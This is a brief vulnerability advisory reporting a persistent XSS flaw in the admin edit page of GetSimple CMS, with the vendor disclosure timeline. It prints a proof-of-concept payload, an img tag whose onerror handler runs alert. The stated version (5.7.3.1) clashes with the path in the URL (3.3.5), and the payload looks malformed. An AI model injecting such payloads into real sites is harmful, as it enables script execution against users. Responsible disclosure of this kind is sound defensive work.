#Date: 29/06/2015
#Discovered by: Joel Vadodil Varghese
#Type of vulnerability: Persistent XSS
#Tested on: Windows 7
#Product: GetSimple CMS
#Version: 5.7.3.1
#Description: Application is vulnerable to Persistent XSS attack on page -

URL -
http://localhost/Getsimplecms-3.3.5/admin/edit.php?id=temp&upd=edit-success&type=edit
Payload - ">img src="blah.jpg" onerror="alert('XSS')"/

Notified Vendor: May 20, 2015
Response: June 19, 2015
Closure: June 23, 2015 (
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1046)

-- 
Regards,

*Joel V*